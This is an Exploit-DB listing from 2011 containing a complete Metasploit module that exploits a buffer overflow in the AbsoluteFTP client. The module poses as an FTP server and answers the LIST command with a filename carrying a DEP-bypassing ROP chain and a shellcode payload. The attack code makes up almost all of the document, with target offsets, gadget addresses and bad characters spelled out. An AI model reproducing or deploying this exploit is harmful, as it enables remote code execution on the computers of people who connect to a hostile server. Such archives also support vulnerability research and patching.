AbsoluteFTP 1.9.6 < 2.2.10 - 'LIST' Remote Buffer Overflow (Metasploit)

EDB-ID:

18102


Author:

Node

Type:

remote


Platform:

Windows

Date:

2011-11-09


# Exploit Title: AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)
# Date: 2011-11-09
# Author: Node
# Software Link: http://www.vandyke.com/pub/AbsoluteFTP/aftp2210.exe
# Version: 1.9.6 - 2.2.10
# Tested on: Windows XP SP3, Windows 7 SP1
# CVE : -

# Exploit has been tested to work on:

# AbsoluteFTP 2.2.10 (build 252)
# AbsoluteFTP 2.2.9 (build 248)
# AbsoluteFTP 2.2.8 (build 241)
# AbsoluteFTP 2.2.7 (build 238)
# AbsoluteFTP 2.2.6 (build 230)
# AbsoluteFTP 2.2.5 (build 225)
# AbsoluteFTP 2.2.4 (build 216)
# AbsoluteFTP 2.2.3 (build 210)
# AbsoluteFTP 2.2.2 (build 203)
# AbsoluteFTP 2.2 (build 197)
# AbsoluteFTP 2.2 (build 291)
# AbsoluteFTP 2.2B3 (build 163)
# AbsoluteFTP 2.2B2 (build 158)
# AbsoluteFTP 2.2B1 (build 144)
# AbsoluteFTP 2.0.5 (build 297)
# AbsoluteFTP 2.0.4 (build 293)
# AbsoluteFTP 2.0.3 (build 289)
# AbsoluteFTP 1.9.6

# Does not work on:

# AbsoluteFTP 1.8


##
# $Id: $
# Skeleton generated by mona.py - Corelan Team
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::FtpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
			'Description'	=> %q{
					This module exploits VanDyke Software AbsoluteFTP by overflowing
					a filename buffer related to the LIST command.
					
			},
			'License'		=> MSF_LICENSE,
			'Author'		=>
				[
					'Node',	# Original discovery, MSF module, ROP code
				],
			'Version'		=> '$Revision:$',
			'References'	=>
				[
					[ 'OSVDB', '---' ],
					[ 'CVE', '---' ],
					[ 'URL', '---' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Platform'       => 'win',
			'Payload'        =>
				{
					'BadChars'        => "\x00\x0d\x5c\x2f\x0a", 
				},
			'Targets'		=>
				[
					[ 'WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252',
						{
							'Ret'   	=>	0x5f479005,
							'Offset'	=>	3336
						}
					],
				],
			'Privileged'	=> false,
			'DisclosureDate'	=> 'MONTH DAY YEAR',
			'DefaultTarget'	=> 0))

	end



	#copypasted from ScriptFTP exploit
	def on_client_unknown_command(c,cmd,arg)
		c.put("200 OK\r\n")
	end

	def on_client_command_list(c,arg)

		conn = establish_data_connection(c)
		if(not conn)
			c.put("425 Can't build data connection\r\n")
			return
		end

		print_status(" - Data connection set up")
		code = 150
		c.put("#{code} Here comes the directory listing.\r\n")

		code = 226
		c.put("#{code} Directory send ok.\r\n")

	rop_gadgets = 
		[		
			0x5f46a206,	# POP EAX # RETN (MFC42.DLL)
			0x5f49b260,	# <- *&VirtualProtect() 
			0x5f413fa0,	# MOV EAX,DWORD PTR DS:[EAX] # RETN 04    ** [MFC42.DLL]
			0x5f418d93,	# PUSH EAX # ADD AL,5F # POP ESI # POP EBX # RETN    ** [MFC42.DLL]
			0x90909090,	# NOPS (RETN 4)
			0x90909090,	# NOPS (-> ebx)
			0x5f432001,	# POP EBP # RETN (MFC42.DLL)
			0x5F4774D5,	# ptr to 'jmp esp' (from MFC42.DLL)
			0x5f46a206,	# POP EAX # RETN (MFC42.DLL)
			0xfffffdff,	# value to negate, target value : 0x00000201, target reg : ebx #<--ADJUST ME FOR BIGGER PAYLOAD
			0x5f46f6dd,	# NEG EAX # RETN (MFC42.DLL)
			0x5f47909a,	# XCHG EAX,EBX # DEC EDX # POP EDI # RETN (MFC42.DLL)
			0x90909090,	# NOPS (-> edi)
			0x5f498456,	# POP ECX # RETN (MFC42.DLL)
			0x5F4D1115,	# RW pointer (lpOldProtect) (-> ecx) !!!
			0x5f46a206,	# POP EAX # RETN (MFC42.DLL)
			0xffffffc0,	# value to negate, target value : 0x00000040, target reg : edx
			0x5f46f6dd,	# NEG EAX # RETN (MFC42.DLL)
			0x5f4892df,	# XCHG EAX,EDX # DEC EAX # POP EDI # RETN (MFC42.DLL)
			0x5f479005,	# ROP NOP (-> edi)
			0x5f46a206,	# POP EAX # RETN (MFC42.DLL)
			0x90909090,	# NOPS (-> eax)
			0x5f4755b8,	# PUSHAD # RETN (MFC42.DLL)
		].pack("V*")


		buffer = [0x5f479005].pack("V*")*848 #ROP NOP's				
		buffer << rop_gadgets
		buffer << "\x90"*30
		buffer << payload.encoded
		

		#copypasted from ScriptFTP exploit
		print_status(" - Sending directory list via data connection")
		dirlist =  "-rwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 #{buffer}.txt\r\n"
		dirlist << "   5 ftpuser  ftpusers       512 Jul 26  2001 A\r\n"
		dirlist << "rwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 #{buffer}.txt\r\n"

		conn.put(dirlist)
		conn.close
		return
	end

end